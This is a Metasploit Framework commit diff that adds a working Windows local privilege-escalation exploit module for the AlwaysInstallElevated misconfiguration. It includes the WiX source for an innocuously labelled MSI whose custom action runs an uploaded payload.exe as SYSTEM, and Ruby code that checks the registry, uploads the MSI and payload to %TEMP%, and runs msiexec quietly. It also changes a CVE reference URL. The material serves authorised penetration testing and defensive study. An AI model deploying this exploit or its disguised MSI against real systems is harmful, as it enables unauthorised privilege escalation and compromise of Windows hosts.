Merge branch 'master' of github.com:rapid7/metasploit-framework

sinn3r · sinn3r · commit b2f906e83e0c · 2012-11-28T15:10:51.000-06:00
diff --git a/data/exploits/exec_payload.msi b/data/exploits/exec_payload.msi
diff --git a/external/source/exploits/exec_payload_msi/exec_payload.wxs b/external/source/exploits/exec_payload_msi/exec_payload.wxs
@@ -0,0 +1,29 @@
+<?xml version='1.0' encoding='windows-1252'?>
+<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
+  <Product Name='Foobar 1.0' Id='*' 
+    Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
+
+	<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" />	
+	
+	<Media Id='1' Cabinet='product.cab' EmbedCab='yes' />
+
+	<Directory Id='TARGETDIR' Name='SourceDir'>
+	   <Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
+		  <Condition>0</Condition>
+	   </Component>		
+	</Directory>
+	
+	<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
+	<CustomAction Id='ExecNotepad' Directory='TARGETDIR' Impersonate='no' Execute='deferred' ExeCommand='[SourceDir]payload.exe' Return='asyncNoWait'/>
+
+    <Feature Id='Complete' Level='1'>
+		<ComponentRef Id='MyComponent' />
+    </Feature>
+	
+	<InstallExecuteSequence>
+		<ResolveSource After="CostInitialize" />
+		<Custom Action="ExecNotepad" After="InstallInitialize" />
+	</InstallExecuteSequence>
+
+  </Product>
+</Wix>
diff --git a/lib/msf/core/module/reference.rb b/lib/msf/core/module/reference.rb
@@ -95,7 +95,7 @@ def initialize(in_ctx_id = 'Unknown', in_ctx_val = '')
 		if (in_ctx_id == 'OSVDB')
 			self.site = 'http://www.osvdb.org/' + in_ctx_val.to_s
 		elsif (in_ctx_id == 'CVE')
-			self.site = 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=' + in_ctx_val.to_s
+			self.site = "http://cvedetails.com/cve/#{in_ctx_val.to_s}/"
 		elsif (in_ctx_id == 'BID')
 			self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
 		elsif (in_ctx_id == 'MSB')
diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb
@@ -0,0 +1,178 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/windows/registry'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+
+class Metasploit3 < Msf::Exploit::Local
+	Rank = AverageRanking
+
+	include Msf::Exploit::EXE
+	include Msf::Post::Common
+	include Msf::Post::File
+	include Msf::Post::Windows::Registry
+
+	def initialize(info={})
+		super(update_info(info, {
+			'Name'          => 'Windows AlwaysInstallElevated MSI',
+			'Description'    => %q{
+					This module checks the AlwaysInstallElevated registry keys which dictate if
+				.MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).
+
+				The default MSI file is data/exploits/exec_payload.msi with the WiX source file
+				under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply
+				executes payload.exe within the same folder.
+
+				The MSI may not execute succesfully successive times, but may be able to get around
+				this by regenerating the MSI.
+
+				MSI can be rebuilt from the source using the WIX tool with the following commands:
+				candle exec_payload.wxs
+				light exec_payload.wixobj
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'Ben Campbell',
+					'Parvez Anwar' # discovery?/inspiration
+				],
+			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
+			'Platform'      => [ 'win' ],
+			'SessionTypes'  => [ 'meterpreter' ],
+			'DefaultOptions' =>
+				{
+					'WfsDelay' => 10,
+					'EXITFUNC' => 'thread',
+					'InitialAutoRunScript' => 'migrate -k -f'
+				},
+			'Targets'       =>
+				[
+					[ 'Windows', { } ],
+				],
+			'References'    =>
+				[
+					[ 'URL', 'http://www.greyhathacker.net/?p=185' ],
+					[ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
+					[ 'URL', 'http://wix.sourceforge.net'] ,
+				],
+			'DisclosureDate'=> 'Mar 18 2010',
+			'DefaultTarget' => 0
+		}))
+
+		register_advanced_options([
+			OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),
+			OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])
+		], self.class)
+	end
+
+	def check
+		install_elevated = "AlwaysInstallElevated"
+		installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
+		hkcu = "HKEY_CURRENT_USER\\#{installer}"
+		hklm = "HKEY_LOCAL_MACHINE\\#{installer}"
+
+		local_machine_value = registry_getvaldata(hklm,install_elevated)
+
+		if local_machine_value.nil?
+			print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
+			return Msf::Exploit::CheckCode::Safe
+		elsif local_machine_value == 0
+			print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
+			return Msf::Exploit::CheckCode::Safe
+		else
+			print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
+			current_user_value = registry_getvaldata(hkcu,install_elevated)
+		end
+
+		if current_user_value.nil?
+			print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
+			return Msf::Exploit::CheckCode::Safe
+		elsif current_user_value == 0
+			print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
+			return Msf::Exploit::CheckCode::Safe
+		else
+			print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
+			return Msf::Exploit::CheckCode::Vulnerable
+		end
+	end
+
+	def cleanup
+		if not @executed
+			return
+		end
+
+		begin
+			print_status("Deleting MSI...")
+			file_rm(@msi_destination)
+		rescue Rex::Post::Meterpreter::RequestError => e
+			print_error(e.to_s)
+			print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.")
+		end
+
+		begin
+			print_status("Deleting Payload...")
+			file_rm(@payload_destination)
+		rescue Rex::Post::Meterpreter::RequestError => e
+			print_error(e.to_s)
+			print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.")
+		end
+	end
+
+	def exploit
+
+		if check != Msf::Exploit::CheckCode::Vulnerable
+			@executed = false
+			return
+		end
+
+		@executed = true
+
+		msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
+		msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
+
+		# Upload MSI
+		@msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
+		print_status("Uploading the MSI to #{@msi_destination} ...")
+
+		#upload_file - ::File.read doesn't appear to work in windows...
+		source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
+		write_file(@msi_destination, source)
+
+		# Upload payload
+		payload = generate_payload_exe
+		@payload_destination = expand_path("%TEMP%\\payload.exe").strip
+		print_status("Uploading the Payload to #{@payload_destination} ...")
+		write_file(@payload_destination, payload)
+
+		# Execute MSI
+		print_status("Executing MSI...")
+
+		if datastore['LOG_FILE'].nil?
+			logging = ""
+		else
+			logging = "/l* #{datastore['LOG_FILE']} "
+		end
+
+		if datastore['QUIET']
+			quiet = "/quiet "
+		else
+			quiet = ""
+		end
+
+		cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}"
+		vprint_status("Executing: #{cmd}")
+		begin
+			result = cmd_exec(cmd)
+		rescue Rex::TimeoutError
+			vprint_status("Execution timed out.")
+		end
+		vprint_status("MSI command-line feedback: #{result}")
+	end
+end
